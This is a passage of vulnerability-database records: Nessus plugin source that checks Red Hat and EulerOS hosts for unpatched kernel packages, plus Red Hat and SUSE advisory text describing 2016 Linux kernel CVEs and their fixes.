\"kernel-debuginfo-common-x86_64-3.10.0-229.40.1.88\",\n \"kernel-devel-3.10.0-229.40.1.88\",\n \"kernel-headers-3.10.0-229.40.1.88\",\n \"kernel-tools-3.10.0-229.40.1.88\",\n \"kernel-tools-libs-3.10.0-229.40.1.88\",\n \"perf-3.10.0-229.40.1.88\",\n \"python-perf-3.10.0-229.40.1.88\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T05:38:10", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.1\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the Linux kernel's keyring handling code, where\nin key_reject_and_link() an uninitialised variable would eventually\nlead to arbitrary free address which could allow attacker to use a\nuse-after-free style attack. (CVE-2016-4470, Important)\n\n* A flaw was found in the way certain interfaces of the Linux kernel's\nInfiniband subsystem used write() as bi-directional ioctl()\nreplacement, which could lead to insufficient memory security checks\nwhen being invoked using the splice() system call. A local\nunprivileged user on a system with either Infiniband hardware present\nor RDMA Userspace Connection Manager Access module explicitly loaded,\ncould use this flaw to escalate their privileges on the system.\n(CVE-2016-4565, Important)\n\n* A flaw was found in the implementation of the Linux kernel's\nhandling of networking challenge ack where an attacker is able to\ndetermine the shared counter which could be used to determine sequence\nnumbers for TCP stream injection. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Jann Horn for reporting CVE-2016-4565 and\nYue Cao (Cyber Security Group of the CS department of University of\nCalifornia in Riverside) for reporting CVE-2016-5696. The\nCVE-2016-4470 issue was discovered by David Howells (Red Hat Inc.).", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-08-24T00:00:00", "title": "RHEL 7 : kernel (RHSA-2016:1657)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5696", "CVE-2016-4470", "CVE-2016-4565"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.1", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2016-1657.NASL", "href": "https://www.tenable.com/plugins/nessus/93094", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1657. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93094);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-4470\", \"CVE-2016-4565\", \"CVE-2016-5696\");\n script_xref(name:\"RHSA\", value:\"2016:1657\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:1657)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.1\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the Linux kernel's keyring handling code, where\nin key_reject_and_link() an uninitialised variable would eventually\nlead to arbitrary free address which could allow attacker to use a\nuse-after-free style attack. (CVE-2016-4470, Important)\n\n* A flaw was found in the way certain interfaces of the Linux kernel's\nInfiniband subsystem used write() as bi-directional ioctl()\nreplacement, which could lead to insufficient memory security checks\nwhen being invoked using the splice() system call. A local\nunprivileged user on a system with either Infiniband hardware present\nor RDMA Userspace Connection Manager Access module explicitly loaded,\ncould use this flaw to escalate their privileges on the system.\n(CVE-2016-4565, Important)\n\n* A flaw was found in the implementation of the Linux kernel's\nhandling of networking challenge ack where an attacker is able to\ndetermine the shared counter which could be used to determine sequence\nnumbers for TCP stream injection. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Jann Horn for reporting CVE-2016-4565 and\nYue Cao (Cyber Security Group of the CS department of University of\nCalifornia in Riverside) for reporting CVE-2016-5696. The\nCVE-2016-4470 issue was discovered by David Howells (Red Hat Inc.).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:1657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4470\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-4565\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5696\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-4470\", \"CVE-2016-4565\", \"CVE-2016-5696\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:1657\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1657\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"kernel-abi-whitelists-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", reference:\"kernel-doc-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"perf-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"perf-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"python-perf-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"1\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-229.40.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:41:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "edition": 1, "description": "This update for the Linux Kernel 3.12.48-52_27 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in\n net/core/datagram.c in the Linux kernel did not accept a length\n argument, which allowed local users to cause a denial of service (memory\n corruption) or possibly have unspecified other impact via a write system\n call followed by a recvmsg system call (bsc#979078).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "modified": "2016-08-09T17:23:39", "published": "2016-08-09T17:23:39", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00018.html", "id": "SUSE-SU-2016:2005-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 8 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:01:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-52_31 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in\n net/core/datagram.c in the Linux kernel did not accept a length\n argument, which allowed local users to cause a denial of service (memory\n corruption) or possibly have unspecified other impact via a write system\n call followed by a recvmsg system call (bsc#979078).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the\n Linux kernel allowed local users to bypass intended AF_UNIX socket\n permissions or cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\n", "modified": "2016-08-09T17:10:44", "published": "2016-08-09T17:10:44", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00009.html", "id": "SUSE-SU-2016:1995-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 9 for SLE 12 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-60_20 fixes the several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in\n net/core/datagram.c in the Linux kernel did not accept a length\n argument, which allowed local users to cause a denial of service (memory\n corruption) or possibly have unspecified other impact via a write system\n call followed by a recvmsg system call (bsc#979078).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793). This non-security issue\n was fixed:\n - bsc#973570: The fix for CVE-2013-7446 introduced a bug that could have\n possibly lead to a softlockup.\n\n", "modified": "2016-08-09T17:09:05", "published": "2016-08-09T17:09:05", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00008.html", "id": "SUSE-SU-2016:1994-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 1 for SLE 12 SP1 (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "description": "This update for the Linux Kernel 3.12.49-11.1 fixes the several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in\n net/core/datagram.c in the Linux kernel did not accept a length\n argument, which allowed local users to cause a denial of service (memory\n corruption) or possibly have unspecified other impact via a write system\n call followed by a recvmsg system call (bsc#979078).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n This non-security issue was fixed:\n - bsc#973570: The fix for CVE-2013-7446 introduced a bug that could have\n possibly lead to a softlockup.\n\n", "edition": 1, "modified": "2016-08-04T20:09:13", "published": "2016-08-04T20:09:13", "id": "SUSE-SU-2016:1961-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00003.html", "type": "suse", "title": "Security update for Linux Kernel Live Patch 0 for SLE 12 SP1 (important)", "cvss": {"score": 7.2, "vector": 